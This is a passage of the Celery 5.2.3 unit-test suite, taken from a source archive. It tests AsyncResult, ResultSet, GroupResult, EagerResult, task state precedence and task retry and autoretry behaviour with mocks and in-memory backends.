backend: result = self.app.AsyncResult(self.task1['id']) result_clone = copy.copy(result) del result assert backend.remove_pending_result.called_once_with( result_clone ) result = self.app.AsyncResult(self.task1['id']) result.backend = None del result def test_get_request_meta(self): x = self.app.AsyncResult('1') request = Context( task='foo', children=None, args=['one', 'two'], kwargs={'kwarg1': 'three'}, hostname="foo", retries=1, delivery_info={'routing_key': 'celery'} ) x.backend.store_result(task_id="1", result='foo', state=states.SUCCESS, traceback=None, request=request) assert x.name == 'foo' assert x.args == ['one', 'two'] assert x.kwargs == {'kwarg1': 'three'} assert x.worker == 'foo' assert x.retries == 1 assert x.queue == 'celery' assert isinstance(x.date_done, datetime.datetime) assert x.task_id == "1" assert x.state == "SUCCESS" result = self.app.AsyncResult(self.task4['id']) assert result.date_done is None @pytest.mark.parametrize('result_dict, date', [ ({'date_done': None}, None), ({'date_done': '1991-10-05T05:41:06'}, datetime.datetime(1991, 10, 5, 5, 41, 6)), ({'date_done': datetime.datetime(1991, 10, 5, 5, 41, 6)}, datetime.datetime(1991, 10, 5, 5, 41, 6)) ]) def test_date_done(self, result_dict, date): result = self.app.AsyncResult(uuid()) result._cache = result_dict assert result.date_done == date 
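# ---------------------------------------------------------------------------
# Editor's note (illustrative sketch, not part of the original test module):
# the test_AsyncResult class above seeds the result backend up front with
# mark_as_done()/mark_as_failure() and then asserts on AsyncResult state,
# .get() and propagate behaviour.  The helper below sketches that same
# pattern as a self-contained round-trip against a throwaway app; the app
# name 'sketch', the helper name and the memory broker / cache backend URLs
# are assumptions chosen for illustration only.


def _sketch_asyncresult_roundtrip():
    from celery import Celery, states, uuid

    app = Celery('sketch', broker='memory://', backend='cache+memory://')

    done_id = uuid()
    app.backend.mark_as_done(done_id, 'the')        # pre-store a SUCCESS result
    assert app.AsyncResult(done_id).get(timeout=1) == 'the'

    failed_id = uuid()
    app.backend.mark_as_failure(failed_id, KeyError('brown'))
    failed = app.AsyncResult(failed_id)
    assert failed.state == states.FAILURE
    # propagate=False returns the stored exception instead of raising it
    assert isinstance(failed.get(propagate=False), KeyError)
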
class test_ResultSet: def test_resultset_repr(self): assert repr(self.app.ResultSet( [self.app.AsyncResult(t) for t in ['1', '2', '3']])) def test_eq_other(self): assert self.app.ResultSet([ self.app.AsyncResult(t) for t in [1, 3, 3]]) != 1 rs1 = self.app.ResultSet([self.app.AsyncResult(1)]) rs2 = self.app.ResultSet([self.app.AsyncResult(1)]) assert rs1 == rs2 def test_get(self): x = self.app.ResultSet([self.app.AsyncResult(t) for t in [1, 2, 3]]) b = x.results[0].backend = Mock() b.supports_native_join = False x.join_native = Mock() x.join = Mock() x.get() x.join.assert_called() b.supports_native_join = True x.get() x.join_native.assert_called() @patch('celery.result.task_join_will_block') def test_get_sync_subtask_option(self, task_join_will_block): task_join_will_block.return_value = True x = self.app.ResultSet([self.app.AsyncResult(str(t)) for t in [1, 2, 3]]) b = x.results[0].backend = Mock() b.supports_native_join = False with pytest.raises(RuntimeError): x.get() with pytest.raises(TimeoutError): x.get(disable_sync_subtasks=False, timeout=0.1) def test_join_native_with_group_chain_group(self): """Test group(chain(group)) case, join_native can be run correctly. In group(chain(group)) case, GroupResult has no _cache property, and AsyncBackendMixin.iter_native returns a node instead of node._cache, this test make sure ResultSet.join_native can process correctly both values of AsyncBackendMixin.iter_native returns. """ def _get_meta(tid, result=None, children=None): return { 'status': states.SUCCESS, 'result': result, 'children': children, 'task_id': tid, } results = [self.app.AsyncResult(t) for t in [1, 2, 3]] values = [(_.id, _get_meta(_.id, _)) for _ in results] g_res = GroupResult(6, [self.app.AsyncResult(t) for t in [4, 5]]) results += [g_res] values += [(6, g_res.children)] x = self.app.ResultSet(results) x.results[0].backend = Mock() x.results[0].backend.join = Mock() x.results[3][0].get = Mock() x.results[3][0].get.return_value = g_res.results[0] x.results[3][1].get = Mock() x.results[3][1].get.return_value = g_res.results[1] x.iter_native = Mock() x.iter_native.return_value = values.__iter__() x.join_native() x.iter_native.assert_called() def test_eq_ne(self): g1 = self.app.ResultSet([ self.app.AsyncResult('id1'), self.app.AsyncResult('id2'), ]) g2 = self.app.ResultSet([ self.app.AsyncResult('id1'), self.app.AsyncResult('id2'), ]) g3 = self.app.ResultSet([ self.app.AsyncResult('id3'), self.app.AsyncResult('id1'), ]) assert g1 == g2 assert g1 != g3 assert g1 != object() def test_takes_app_from_first_task(self): x = ResultSet([self.app.AsyncResult('id1')]) assert x.app is x.results[0].app x.app = self.app assert x.app is self.app def test_get_empty(self): x = self.app.ResultSet([]) assert x.supports_native_join is None x.join = Mock(name='join') x.get() x.join.assert_called() def test_add(self): x = self.app.ResultSet([self.app.AsyncResult(1)]) x.add(self.app.AsyncResult(2)) assert len(x) == 2 x.add(self.app.AsyncResult(2)) assert len(x) == 2 @contextmanager def dummy_copy(self): with patch('celery.result.copy') as copy: def passt(arg): return arg copy.side_effect = passt yield def test_add_discard(self): x = self.app.ResultSet([]) x.add(self.app.AsyncResult('1')) assert self.app.AsyncResult('1') in x.results x.discard(self.app.AsyncResult('1')) x.discard(self.app.AsyncResult('1')) x.discard('1') assert self.app.AsyncResult('1') not in x.results x.update([self.app.AsyncResult('2')]) def test_clear(self): x = self.app.ResultSet([]) r = x.results x.clear() assert x.results is r 
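# ---------------------------------------------------------------------------
# Editor's note (illustrative sketch, not part of the original test module):
# test_GroupResult below exercises GroupResult.save() / GroupResult.restore()
# against mocked results.  The helper sketches the same save/restore
# round-trip end to end on a throwaway app; the app name 'sketch_group',
# the helper name and the memory broker / cache backend URLs are assumptions
# for illustration only.


def _sketch_groupresult_save_restore():
    from celery import Celery, uuid
    from celery.result import GroupResult

    app = Celery('sketch_group', broker='memory://',
                 backend='cache+memory://')

    group_id = uuid()
    children = [app.AsyncResult(uuid()) for _ in range(3)]
    app.GroupResult(group_id, children).save()      # persists the child ids

    restored = GroupResult.restore(group_id, app=app)
    assert restored.id == group_id
    # restored children compare equal to the originals by task id
    assert restored.results == children
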
class MockAsyncResultFailure(AsyncResult): @property def result(self): return KeyError('baz') @property def state(self): return states.FAILURE def get(self, propagate=True, **kwargs): if propagate: raise self.result return self.result class MockAsyncResultSuccess(AsyncResult): forgotten = False def __init__(self, *args, **kwargs): self._result = kwargs.pop('result', 42) super().__init__(*args, **kwargs) def forget(self): self.forgotten = True @property def result(self): return self._result @property def state(self): return states.SUCCESS def get(self, **kwargs): return self.result class SimpleBackend(SyncBackendMixin): ids = [] def __init__(self, ids=[]): self.ids = ids def _ensure_not_eager(self): pass def get_many(self, *args, **kwargs): return ((id, {'result': i, 'status': states.SUCCESS}) for i, id in enumerate(self.ids)) class test_GroupResult: def setup(self): self.size = 10 self.ts = self.app.GroupResult( uuid(), make_mock_group(self.app, self.size), ) @pytest.mark.usefixtures('depends_on_current_app') def test_is_pickleable(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) assert pickle.loads(pickle.dumps(ts)) == ts ts2 = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) assert pickle.loads(pickle.dumps(ts2)) == ts2 @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) fun, args = ts.__reduce__() ts2 = fun(*args) assert ts2.id == ts.id assert ts == ts2 def test_eq_ne(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) ts2 = self.app.GroupResult(ts.id, ts.results) ts3 = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) ts4 = self.app.GroupResult(ts.id, [self.app.AsyncResult(uuid())]) assert ts == ts2 assert ts != ts3 assert ts != ts4 assert ts != object() def test_len(self): assert len(self.ts) == self.size def test_eq_other(self): assert self.ts != 1 def test_eq_with_parent(self): # GroupResult instances with different .parent are not equal grp_res = self.app.GroupResult( uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)], parent=self.app.AsyncResult(uuid()) ) grp_res_2 = self.app.GroupResult(grp_res.id, grp_res.results) assert grp_res != grp_res_2 grp_res_2.parent = self.app.AsyncResult(uuid()) assert grp_res != grp_res_2 grp_res_2.parent = grp_res.parent assert grp_res == grp_res_2 @pytest.mark.usefixtures('depends_on_current_app') def test_pickleable(self): assert pickle.loads(pickle.dumps(self.ts)) def test_forget(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app), MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) ts.forget() for sub in subs: assert sub.forgotten def test_get_nested_without_native_join(self): backend = SimpleBackend() backend.supports_native_join = False ts = self.app.GroupResult(uuid(), [ MockAsyncResultSuccess(uuid(), result='1.1', app=self.app, backend=backend), self.app.GroupResult(uuid(), [ MockAsyncResultSuccess(uuid(), result='2.1', app=self.app, backend=backend), self.app.GroupResult(uuid(), [ MockAsyncResultSuccess(uuid(), result='3.1', app=self.app, backend=backend), MockAsyncResultSuccess(uuid(), result='3.2', app=self.app, backend=backend), ]), ]), ]) with patch('celery.Celery.backend', new=backend): vals = ts.get() assert vals == [ '1.1', [ '2.1', [ '3.1', '3.2', ] ], ] def test_getitem(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app), MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) assert ts[0] is 
subs[0] def test_save_restore(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app), MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) ts.save() with pytest.raises(AttributeError): ts.save(backend=object()) assert self.app.GroupResult.restore(ts.id).results == ts.results ts.delete() assert self.app.GroupResult.restore(ts.id) is None with pytest.raises(AttributeError): self.app.GroupResult.restore(ts.id, backend=object()) def test_save_restore_empty(self): subs = [] ts = self.app.GroupResult(uuid(), subs) ts.save() assert isinstance( self.app.GroupResult.restore(ts.id), self.app.GroupResult, ) assert self.app.GroupResult.restore(ts.id).results == ts.results == [] def test_restore_app(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) ts.save() restored = GroupResult.restore(ts.id, app=self.app) assert restored.id == ts.id def test_restore_current_app_fallback(self): subs = [MockAsyncResultSuccess(uuid(), app=self.app)] ts = self.app.GroupResult(uuid(), subs) ts.save() with pytest.raises(RuntimeError, match="Test depends on current_app"): GroupResult.restore(ts.id) def test_join_native(self): backend = SimpleBackend() results = [self.app.AsyncResult(uuid(), backend=backend) for i in range(10)] ts = self.app.GroupResult(uuid(), results) with patch('celery.Celery.backend', new=backend): backend.ids = [result.id for result in results] res = ts.join_native() assert res == list(range(10)) callback = Mock(name='callback') assert not ts.join_native(callback=callback) callback.assert_has_calls([ call(r.id, i) for i, r in enumerate(ts.results) ]) def test_join_native_raises(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) ts.iter_native = Mock() ts.iter_native.return_value = iter([ (uuid(), {'status': states.FAILURE, 'result': KeyError()}) ]) with pytest.raises(KeyError): ts.join_native(propagate=True) def test_failed_join_report(self): res = Mock() ts = self.app.GroupResult(uuid(), [res]) res.state = states.FAILURE res.backend.is_cached.return_value = True assert next(ts._failed_join_report()) is res res.backend.is_cached.return_value = False with pytest.raises(StopIteration): next(ts._failed_join_report()) def test_repr(self): assert repr( self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])) def test_children_is_results(self): ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())]) assert ts.children is ts.results def test_iter_native(self): backend = SimpleBackend() results = [self.app.AsyncResult(uuid(), backend=backend) for i in range(10)] ts = self.app.GroupResult(uuid(), results) with patch('celery.Celery.backend', new=backend): backend.ids = [result.id for result in results] assert len(list(ts.iter_native())) == 10 def test_join_timeout(self): ar = MockAsyncResultSuccess(uuid(), app=self.app) ar2 = MockAsyncResultSuccess(uuid(), app=self.app) ar3 = self.app.AsyncResult(uuid()) ts = self.app.GroupResult(uuid(), [ar, ar2, ar3]) with pytest.raises(TimeoutError): ts.join(timeout=0.0000001) ar4 = self.app.AsyncResult(uuid()) ar4.get = Mock() ts2 = self.app.GroupResult(uuid(), [ar4]) assert ts2.join(timeout=0.1) callback = Mock(name='callback') assert not ts2.join(timeout=0.1, callback=callback) callback.assert_called_with(ar4.id, ar4.get()) def test_iter_native_when_empty_group(self): ts = self.app.GroupResult(uuid(), []) assert list(ts.iter_native()) == [] def test___iter__(self): assert list(iter(self.ts)) == self.ts.results def test_join(self): joined = 
self.ts.join() assert joined == list(range(self.size)) def test_successful(self): assert self.ts.successful() def test_failed(self): assert not self.ts.failed() def test_maybe_throw(self): self.ts.results = [Mock(name='r1')] self.ts.maybe_throw() self.ts.results[0].maybe_throw.assert_called_with( callback=None, propagate=True, ) def test_join__on_message(self): with pytest.raises(ImproperlyConfigured): self.ts.join(on_message=Mock()) def test_waiting(self): assert not self.ts.waiting() def test_ready(self): assert self.ts.ready() def test_completed_count(self): assert self.ts.completed_count() == len(self.ts) class test_pending_AsyncResult: def test_result(self, app): res = app.AsyncResult(uuid()) assert res.result is None class test_failed_AsyncResult: def setup(self): self.size = 11 self.app.conf.result_serializer = 'pickle' results = make_mock_group(self.app, 10) failed = mock_task('ts11', states.FAILURE, KeyError('Baz')) save_result(self.app, failed) failed_res = self.app.AsyncResult(failed['id']) self.ts = self.app.GroupResult(uuid(), results + [failed_res]) def test_completed_count(self): assert self.ts.completed_count() == len(self.ts) - 1 def test_join(self): with pytest.raises(KeyError): self.ts.join() def test_successful(self): assert not self.ts.successful() def test_failed(self): assert self.ts.failed() class test_pending_Group: def setup(self): self.ts = self.app.GroupResult( uuid(), [self.app.AsyncResult(uuid()), self.app.AsyncResult(uuid())]) def test_completed_count(self): assert self.ts.completed_count() == 0 def test_ready(self): assert not self.ts.ready() def test_waiting(self): assert self.ts.waiting() def test_join(self): with pytest.raises(TimeoutError): self.ts.join(timeout=0.001) def test_join_longer(self): with pytest.raises(TimeoutError): self.ts.join(timeout=1) class test_EagerResult: def setup(self): @self.app.task(shared=False) def raising(x, y): raise KeyError(x, y) self.raising = raising def test_wait_raises(self): res = self.raising.apply(args=[3, 3]) with pytest.raises(KeyError): res.wait() assert res.wait(propagate=False) def test_wait(self): res = EagerResult('x', 'x', states.RETRY) res.wait() assert res.state == states.RETRY assert res.status == states.RETRY def test_forget(self): res = EagerResult('x', 'x', states.RETRY) res.forget() def test_revoke(self): res = self.raising.apply(args=[3, 3]) assert not res.revoke() @patch('celery.result.task_join_will_block') def test_get_sync_subtask_option(self, task_join_will_block): task_join_will_block.return_value = True tid = uuid() res_subtask_async = EagerResult(tid, 'x', 'x', states.SUCCESS) with pytest.raises(RuntimeError): res_subtask_async.get() res_subtask_async.get(disable_sync_subtasks=False) class test_tuples: def test_AsyncResult(self): x = self.app.AsyncResult(uuid()) assert x, result_from_tuple(x.as_tuple() == self.app) assert x, result_from_tuple(x == self.app) def test_with_parent(self): x = self.app.AsyncResult(uuid()) x.parent = self.app.AsyncResult(uuid()) y = result_from_tuple(x.as_tuple(), self.app) assert y == x assert y.parent == x.parent assert isinstance(y.parent, AsyncResult) def test_compat(self): uid = uuid() x = result_from_tuple([uid, []], app=self.app) assert x.id == uid def test_as_list(self): uid = uuid() x = self.app.AsyncResult(uid) assert x.id == x.as_list()[0] assert isinstance(x.as_list(), list) def test_GroupResult(self): x = self.app.GroupResult( uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)], ) assert x, result_from_tuple(x.as_tuple() == self.app) assert x, 
result_from_tuple(x == self.app) def test_GroupResult_with_parent(self): parent = self.app.AsyncResult(uuid()) result = self.app.GroupResult( uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)], parent ) second_result = result_from_tuple(result.as_tuple(), self.app) assert second_result == result assert second_result.parent == parent def test_GroupResult_as_tuple(self): parent = self.app.AsyncResult(uuid()) result = self.app.GroupResult( 'group-result-1', [self.app.AsyncResult(f'async-result-{i}') for i in range(2)], parent ) (result_id, parent_tuple), group_results = result.as_tuple() assert result_id == result.id assert parent_tuple == parent.as_tuple() assert parent_tuple[0][0] == parent.id assert isinstance(group_results, list) expected_grp_res = [((f'async-result-{i}', None), None) for i in range(2)] assert group_results == expected_grp_res ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/tasks/test_states.py0000664000175000017500000000207500000000000020164 0ustar00asifasif00000000000000import pytest from celery import states class test_state_precedence: @pytest.mark.parametrize('r,l', [ (states.SUCCESS, states.PENDING), (states.FAILURE, states.RECEIVED), (states.REVOKED, states.STARTED), (states.SUCCESS, 'CRASHED'), (states.FAILURE, 'CRASHED'), ]) def test_gt(self, r, l): assert states.state(r) > states.state(l) @pytest.mark.parametrize('r,l', [ ('CRASHED', states.REVOKED), ]) def test_gte(self, r, l): assert states.state(r) >= states.state(l) @pytest.mark.parametrize('r,l', [ (states.PENDING, states.SUCCESS), (states.RECEIVED, states.FAILURE), (states.STARTED, states.REVOKED), ('CRASHED', states.SUCCESS), ('CRASHED', states.FAILURE), (states.REVOKED, 'CRASHED'), ]) def test_lt(self, r, l): assert states.state(r) < states.state(l) @pytest.mark.parametrize('r,l', [ (states.REVOKED, 'CRASHED'), ]) def test_lte(self, r, l): assert states.state(r) <= states.state(l) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/tasks/test_tasks.py0000664000175000017500000015073300000000000020013 0ustar00asifasif00000000000000import socket import tempfile from datetime import datetime, timedelta from unittest.mock import ANY, MagicMock, Mock, patch, sentinel import pytest from kombu import Queue from kombu.exceptions import EncodeError from celery import Task, group, uuid from celery.app.task import _reprtask from celery.contrib.testing.mocks import ContextMock from celery.exceptions import Ignore, ImproperlyConfigured, Retry from celery.result import AsyncResult, EagerResult from celery.utils.time import parse_iso8601 try: from urllib.error import HTTPError except ImportError: # pragma: no cover from urllib2 import HTTPError def return_True(*args, **kwargs): # Task run functions can't be closures/lambdas, as they're pickled. 
return True class MockApplyTask(Task): abstract = True applied = 0 def run(self, x, y): return x * y def apply_async(self, *args, **kwargs): self.applied += 1 class TaskWithPriority(Task): priority = 10 class TaskWithRetry(Task): autoretry_for = (TypeError,) retry_kwargs = {'max_retries': 5} retry_backoff = True retry_backoff_max = 700 retry_jitter = False class TasksCase: def setup(self): self.mytask = self.app.task(shared=False)(return_True) @self.app.task(bind=True, count=0, shared=False) def increment_counter(self, increment_by=1): self.count += increment_by or 1 return self.count self.increment_counter = increment_counter @self.app.task(shared=False) def raising(): raise KeyError('foo') self.raising = raising @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task(self, arg1, arg2, kwarg=1, max_retries=None, care=True): self.iterations += 1 rmax = self.max_retries if max_retries is None else max_retries assert repr(self.request) retries = self.request.retries if care and retries >= rmax: return arg1 else: raise self.retry(countdown=0, max_retries=rmax) self.retry_task = retry_task @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_noargs(self, **kwargs): self.iterations += 1 if self.request.retries >= 3: return 42 else: raise self.retry(countdown=0) self.retry_task_noargs = retry_task_noargs @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_return_without_throw(self, **kwargs): self.iterations += 1 try: if self.request.retries >= 3: return 42 else: raise Exception("random code exception") except Exception as exc: return self.retry(exc=exc, throw=False) self.retry_task_return_without_throw = retry_task_return_without_throw @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_return_with_throw(self, **kwargs): self.iterations += 1 try: if self.request.retries >= 3: return 42 else: raise Exception("random code exception") except Exception as exc: return self.retry(exc=exc, throw=True) self.retry_task_return_with_throw = retry_task_return_with_throw @self.app.task(bind=True, max_retries=3, iterations=0, shared=False, autoretry_for=(Exception,)) def retry_task_auto_retry_with_single_new_arg(self, ret=None, **kwargs): if ret is None: return self.retry(exc=Exception("I have filled now"), args=["test"], kwargs=kwargs) else: return ret self.retry_task_auto_retry_with_single_new_arg = retry_task_auto_retry_with_single_new_arg @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_auto_retry_with_new_args(self, ret=None, place_holder=None, **kwargs): if ret is None: return self.retry(args=[place_holder, place_holder], kwargs=kwargs) else: return ret self.retry_task_auto_retry_with_new_args = retry_task_auto_retry_with_new_args @self.app.task(bind=True, max_retries=3, iterations=0, shared=False, autoretry_for=(Exception,)) def retry_task_auto_retry_exception_with_new_args(self, ret=None, place_holder=None, **kwargs): if ret is None: return self.retry(exc=Exception("I have filled"), args=[place_holder, place_holder], kwargs=kwargs) else: return ret self.retry_task_auto_retry_exception_with_new_args = retry_task_auto_retry_exception_with_new_args @self.app.task(bind=True, max_retries=10, iterations=0, shared=False, autoretry_for=(Exception,)) def retry_task_max_retries_override(self, **kwargs): # Test for #6436 self.iterations += 1 if self.iterations == 3: # I wanna force fail here cause i have enough self.retry(exc=MyCustomException, 
max_retries=0) self.retry(exc=MyCustomException) self.retry_task_max_retries_override = retry_task_max_retries_override @self.app.task(bind=True, max_retries=0, iterations=0, shared=False, autoretry_for=(Exception,)) def retry_task_explicit_exception(self, **kwargs): # Test for #6436 self.iterations += 1 raise MyCustomException() self.retry_task_explicit_exception = retry_task_explicit_exception @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_raise_without_throw(self, **kwargs): self.iterations += 1 try: if self.request.retries >= 3: return 42 else: raise Exception("random code exception") except Exception as exc: raise self.retry(exc=exc, throw=False) self.retry_task_raise_without_throw = retry_task_raise_without_throw @self.app.task(bind=True, max_retries=3, iterations=0, base=MockApplyTask, shared=False) def retry_task_mockapply(self, arg1, arg2, kwarg=1): self.iterations += 1 retries = self.request.retries if retries >= 3: return arg1 raise self.retry(countdown=0) self.retry_task_mockapply = retry_task_mockapply @self.app.task(bind=True, max_retries=3, iterations=0, shared=False) def retry_task_customexc(self, arg1, arg2, kwarg=1, **kwargs): self.iterations += 1 retries = self.request.retries if retries >= 3: return arg1 + kwarg else: try: raise MyCustomException('Elaine Marie Benes') except MyCustomException as exc: kwargs.update(kwarg=kwarg) raise self.retry(countdown=0, exc=exc) self.retry_task_customexc = retry_task_customexc @self.app.task(bind=True, autoretry_for=(ZeroDivisionError,), shared=False) def autoretry_task_no_kwargs(self, a, b): self.iterations += 1 return a / b self.autoretry_task_no_kwargs = autoretry_task_no_kwargs @self.app.task(bind=True, autoretry_for=(ZeroDivisionError,), retry_kwargs={'max_retries': 5}, shared=False) def autoretry_task(self, a, b): self.iterations += 1 return a / b self.autoretry_task = autoretry_task @self.app.task(bind=True, autoretry_for=(HTTPError,), retry_backoff=True, shared=False) def autoretry_backoff_task(self, url): self.iterations += 1 if "error" in url: fp = tempfile.TemporaryFile() raise HTTPError(url, '500', 'Error', '', fp) return url self.autoretry_backoff_task = autoretry_backoff_task @self.app.task(bind=True, autoretry_for=(HTTPError,), retry_backoff=True, retry_jitter=True, shared=False) def autoretry_backoff_jitter_task(self, url): self.iterations += 1 if "error" in url: fp = tempfile.TemporaryFile() raise HTTPError(url, '500', 'Error', '', fp) return url self.autoretry_backoff_jitter_task = autoretry_backoff_jitter_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def autoretry_for_from_base_task(self, a, b): self.iterations += 1 return a + b self.autoretry_for_from_base_task = autoretry_for_from_base_task @self.app.task(bind=True, base=TaskWithRetry, autoretry_for=(ZeroDivisionError,), shared=False) def override_autoretry_for_from_base_task(self, a, b): self.iterations += 1 return a / b self.override_autoretry_for = override_autoretry_for_from_base_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def retry_kwargs_from_base_task(self, a, b): self.iterations += 1 return a + b self.retry_kwargs_from_base_task = retry_kwargs_from_base_task @self.app.task(bind=True, base=TaskWithRetry, retry_kwargs={'max_retries': 2}, shared=False) def override_retry_kwargs_from_base_task(self, a, b): self.iterations += 1 return a + b self.override_retry_kwargs = override_retry_kwargs_from_base_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def 
retry_backoff_from_base_task(self, a, b): self.iterations += 1 return a + b self.retry_backoff_from_base_task = retry_backoff_from_base_task @self.app.task(bind=True, base=TaskWithRetry, retry_backoff=False, shared=False) def override_retry_backoff_from_base_task(self, a, b): self.iterations += 1 return a + b self.override_retry_backoff = override_retry_backoff_from_base_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def retry_backoff_max_from_base_task(self, a, b): self.iterations += 1 return a + b self.retry_backoff_max_from_base_task = retry_backoff_max_from_base_task @self.app.task(bind=True, base=TaskWithRetry, retry_backoff_max=16, shared=False) def override_retry_backoff_max_from_base_task(self, a, b): self.iterations += 1 return a + b self.override_backoff_max = override_retry_backoff_max_from_base_task @self.app.task(bind=True, base=TaskWithRetry, shared=False) def retry_backoff_jitter_from_base_task(self, a, b): self.iterations += 1 return a + b self.retry_backoff_jitter_from_base = retry_backoff_jitter_from_base_task @self.app.task(bind=True, base=TaskWithRetry, retry_jitter=True, shared=False) def override_backoff_jitter_from_base_task(self, a, b): self.iterations += 1 return a + b self.override_backoff_jitter = override_backoff_jitter_from_base_task @self.app.task(bind=True) def task_check_request_context(self): assert self.request.hostname == socket.gethostname() self.task_check_request_context = task_check_request_context @self.app.task(ignore_result=True) def task_with_ignored_result(): pass self.task_with_ignored_result = task_with_ignored_result @self.app.task(bind=True) def task_called_by_other_task(self): pass @self.app.task(bind=True) def task_which_calls_other_task(self): # Couldn't find a better way to mimic an apply_async() # request with set priority self.request.delivery_info['priority'] = 5 task_called_by_other_task.delay() self.task_which_calls_other_task = task_which_calls_other_task @self.app.task(bind=True) def task_replacing_another_task(self): return "replaced" self.task_replacing_another_task = task_replacing_another_task @self.app.task(bind=True) def task_replaced_by_other_task(self): return self.replace(task_replacing_another_task.si()) @self.app.task(bind=True, autoretry_for=(Exception,)) def task_replaced_by_other_task_with_autoretry(self): return self.replace(task_replacing_another_task.si()) self.task_replaced_by_other_task = task_replaced_by_other_task self.task_replaced_by_other_task_with_autoretry = task_replaced_by_other_task_with_autoretry # Remove all messages from memory-transport from kombu.transport.memory import Channel Channel.queues.clear() class MyCustomException(Exception): """Random custom exception.""" class test_task_retries(TasksCase): def test_retry(self): self.retry_task.max_retries = 3 self.retry_task.iterations = 0 self.retry_task.apply([0xFF, 0xFFFF]) assert self.retry_task.iterations == 4 self.retry_task.max_retries = 3 self.retry_task.iterations = 0 self.retry_task.apply([0xFF, 0xFFFF], {'max_retries': 10}) assert self.retry_task.iterations == 11 def test_retry_priority(self): priority = 7 # Technically, task.priority doesn't need to be set here # since push_request() doesn't populate the delivery_info # with it. However, setting task.priority here also doesn't # cause any problems. 
self.retry_task.priority = priority self.retry_task.push_request() self.retry_task.request.delivery_info = { 'priority': priority } sig = self.retry_task.signature_from_request() assert sig.options['priority'] == priority def test_retry_no_args(self): self.retry_task_noargs.max_retries = 3 self.retry_task_noargs.iterations = 0 self.retry_task_noargs.apply(propagate=True).get() assert self.retry_task_noargs.iterations == 4 def test_signature_from_request__passes_headers(self): self.retry_task.push_request() self.retry_task.request.headers = {'custom': 10.1} sig = self.retry_task.signature_from_request() assert sig.options['headers']['custom'] == 10.1 def test_signature_from_request__delivery_info(self): self.retry_task.push_request() self.retry_task.request.delivery_info = { 'exchange': 'testex', 'routing_key': 'testrk', } sig = self.retry_task.signature_from_request() assert sig.options['exchange'] == 'testex' assert sig.options['routing_key'] == 'testrk' def test_signature_from_request__shadow_name(self): self.retry_task.push_request() self.retry_task.request.shadow = 'test' sig = self.retry_task.signature_from_request() assert sig.options['shadow'] == 'test' def test_retry_kwargs_can_be_empty(self): self.retry_task_mockapply.push_request() try: with pytest.raises(Retry): import sys try: sys.exc_clear() except AttributeError: pass self.retry_task_mockapply.retry(args=[4, 4], kwargs=None) finally: self.retry_task_mockapply.pop_request() def test_retry_without_throw_eager(self): assert self.retry_task_return_without_throw.apply().get() == 42 def test_raise_without_throw_eager(self): assert self.retry_task_raise_without_throw.apply().get() == 42 def test_return_with_throw_eager(self): assert self.retry_task_return_with_throw.apply().get() == 42 def test_eager_retry_with_single_new_params(self): assert self.retry_task_auto_retry_with_single_new_arg.apply().get() == "test" def test_eager_retry_with_new_params(self): assert self.retry_task_auto_retry_with_new_args.si(place_holder="test").apply().get() == "test" def test_eager_retry_with_autoretry_for_exception(self): assert self.retry_task_auto_retry_exception_with_new_args.si(place_holder="test").apply().get() == "test" def test_retry_task_max_retries_override(self): self.retry_task_max_retries_override.max_retries = 10 self.retry_task_max_retries_override.iterations = 0 result = self.retry_task_max_retries_override.apply() with pytest.raises(MyCustomException): result.get() assert self.retry_task_max_retries_override.iterations == 3 def test_retry_task_explicit_exception(self): self.retry_task_explicit_exception.max_retries = 0 self.retry_task_explicit_exception.iterations = 0 result = self.retry_task_explicit_exception.apply() with pytest.raises(MyCustomException): result.get() assert self.retry_task_explicit_exception.iterations == 1 def test_retry_eager_should_return_value(self): self.retry_task.max_retries = 3 self.retry_task.iterations = 0 assert self.retry_task.apply([0xFF, 0xFFFF]).get() == 0xFF assert self.retry_task.iterations == 4 def test_retry_not_eager(self): self.retry_task_mockapply.push_request() try: self.retry_task_mockapply.request.called_directly = False exc = Exception('baz') try: self.retry_task_mockapply.retry( args=[4, 4], kwargs={'task_retries': 0}, exc=exc, throw=False, ) assert self.retry_task_mockapply.applied finally: self.retry_task_mockapply.applied = 0 try: with pytest.raises(Retry): self.retry_task_mockapply.retry( args=[4, 4], kwargs={'task_retries': 0}, exc=exc, throw=True) assert 
